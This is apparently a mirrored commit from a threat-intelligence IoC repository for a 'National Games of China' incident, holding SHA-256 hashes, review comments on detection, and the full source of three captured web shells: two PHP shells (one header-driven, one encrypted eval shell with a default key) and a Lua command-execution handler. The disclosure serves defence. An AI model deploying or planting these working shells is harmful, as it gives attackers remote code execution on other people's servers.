mirror of https://github.com/avast/ioc
National Games of China
parent
3657eda5b8
commit
477a48f73d
Binary file not shown.
|
@ -0,0 +1,26 @@
|
|||
# IoC for National Games of China incident
|
||||
|
||||
### Table of Contents
|
||||
* [IoCs](#IoCs)
|
||||
* [Source Code](#event-names)
|
||||
|
||||
## Samples (SHA-256)
|
||||
#### National Games of China incident related files
|
||||
```
|
||||
0C6AE9DE10BEE6568EC3AD24918C829B7E5132CC0DD1665D4BBF1C3FE84451B6
|
||||
0D1504A9AE319BDC320F938D2CDF72CBA18277B3F2B311ABF0BACAD2517DABC0
|
||||
CAC30CC2F4646979D0BE8B4D5F3A1F87351B3BB77F22E5064BD034CEC9E119BB
|
||||
0AEB963B4566DC2224D34B4885336C666198DB2AC64C810586CE3B17EF3DA59F
|
||||
DFFA7E31797339F3CE7EC453161B60010EDA3DD2E52AA9F147AB4389672C3536
|
||||
BDD4D0BB36D07AE6B97FFBCD386C54E1B15FEFE65329FF0389DFD5739CD3CFF2
|
||||
3A8DC7E730A1F82F65F1731CB31E05E2F749A9E89AB8529168A082D24680D2DD
|
||||
EC8AEF085D3CC57A4E92A613E128F2D9C7B5F03B8E017DD80D89BFEADA228639
|
||||
2CAB3B0391BF3ACE689FC697F522B3C86411E059AB8C1F4F5B7357B484B93035
|
||||
D033756A57D8A2758DE40895849E2146D571B3B44F3089EB68C31483784586CD
|
||||
```
|
||||
## Source Code files
|
||||
```
|
||||
admin2.php
|
||||
conf.lua
|
||||
miss1.php
|
||||
```
|
|
@ -0,0 +1 @@
|
|||
<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);?>
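Review bot: This one-line script is committed as live, executable PHP with nothing in or next to it stating that it is a captured web shell, and the same is true of the conf.lua and miss1.php sections that follow. The README's "Source Code files" list only names the three files, so I would add a line per file there, for example `admin2.php: web shell; calls the function named in the base64-encoded "x" request header with one argument`, and store the samples under a non-executable suffix so a checkout below a web root cannot serve them. For hunting, the trait is a request carrying an `x` header whose value, minus its first character, is base64 that contains a `~` separator once decoded; most default access-log formats do not record arbitrary headers, so this needs header logging or a WAF/proxy rule.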
|
|
@ -0,0 +1,24 @@
|
|||
package.path = package.path .. ';../app/lua/?.lua;./app/lua/?.lua'
|
||||
web = require "libs/webutils"
|
||||
|
||||
|
||||
local handler = {}
|
||||
|
||||
function handler.cc(self, action)
|
||||
local a = io.popen(mg.base64_decode(mg.base64_decode(web:post("username")))):read("*all")
|
||||
--print(a)
|
||||
web:plain(mg.base64_encode(mg.base64_encode(a)))
|
||||
end
|
||||
|
||||
|
||||
|
||||
--- The main loop
|
||||
local a = web:get("a")
|
||||
if handler[a] then
|
||||
local result, err = pcall(handler[a], heandler, a)
|
||||
if result == false then
|
||||
web:json(json.encode({cmd='error', op='error', code=500, result=result, errmsg=err}))
|
||||
end
|
||||
else
|
||||
web:html("hello test!");
|
||||
end
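Review bot: The misspelled `heandler` in `pcall(handler[a], heandler, a)` and the global `web` assignment look like slips in the original sample, and nothing in the commit says the file is preserved byte-for-byte, so a later cleanup could silently destroy useful content-match strings. I would state that in the README and describe the behaviour there: `conf.lua: when query parameter "a" is "cc", runs the doubly base64-decoded POST field "username" via io.popen and returns the output doubly base64-encoded; any other value answers "hello test!"`. That gives responders two things to search for: `a=cc` requests in web logs, and the `hello test!` and `heandler` literals in Lua files on disk.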
|
|
@ -0,0 +1,26 @@
|
|||
<?php
|
||||
@error_reporting(0);
|
||||
session_start();
|
||||
$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
|
||||
$_SESSION['k']=$key;
|
||||
session_write_close();
|
||||
$post=file_get_contents("php://input");
|
||||
if(!extension_loaded('openssl'))
|
||||
{
|
||||
$t="base64_"."decode";
|
||||
$post=$t($post."");
|
||||
|
||||
for($i=0;$i<strlen($post);$i++) {
|
||||
$post[$i] = $post[$i]^$key[$i+1&15];
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
$post=openssl_decrypt($post, "AES128", $key);
|
||||
}
|
||||
$arr=explode('|',$post);
|
||||
$func=$arr[0];
|
||||
$params=$arr[1];
|
||||
class C{public function __invoke($p) {eval($p."");}}
|
||||
@call_user_func(new C(),$params);
|
||||
?>
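Review bot: The only explanation in this file is the untranslated Chinese comment on the `$key` line, which says the key is the first 16 characters of the 32-character MD5 of the connection password and that the default password is `rebeyond`. I would record that in English in the README rather than edit the sample, because it matters for response: with the key hard-coded, request bodies captured for this script can be decrypted offline (AES-128 through `openssl_decrypt`, or base64 plus XOR with the key when the openssl extension is not loaded) to recover what was executed. The structure (key copied to `$_SESSION['k']`, payload split on `|`, `eval` inside `C::__invoke`) appears to match the publicly documented Behinder PHP shell; please confirm and name the family in the README so the hashes can be tied to existing detections. `$func` is assigned from `$arr[0]` and never used, which is worth keeping unchanged as a signature trait.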
|
|
@ -0,0 +1,10 @@
|
|||
0C6AE9DE10BEE6568EC3AD24918C829B7E5132CC0DD1665D4BBF1C3FE84451B6
|
||||
0D1504A9AE319BDC320F938D2CDF72CBA18277B3F2B311ABF0BACAD2517DABC0
|
||||
CAC30CC2F4646979D0BE8B4D5F3A1F87351B3BB77F22E5064BD034CEC9E119BB
|
||||
0AEB963B4566DC2224D34B4885336C666198DB2AC64C810586CE3B17EF3DA59F
|
||||
DFFA7E31797339F3CE7EC453161B60010EDA3DD2E52AA9F147AB4389672C3536
|
||||
BDD4D0BB36D07AE6B97FFBCD386C54E1B15FEFE65329FF0389DFD5739CD3CFF2
|
||||
3A8DC7E730A1F82F65F1731CB31E05E2F749A9E89AB8529168A082D24680D2DD
|
||||
EC8AEF085D3CC57A4E92A613E128F2D9C7B5F03B8E017DD80D89BFEADA228639
|
||||
2CAB3B0391BF3ACE689FC697F522B3C86411E059AB8C1F4F5B7357B484B93035
|
||||
D033756A57D8A2758DE40895849E2146D571B3B44F3089EB68C31483784586CD
|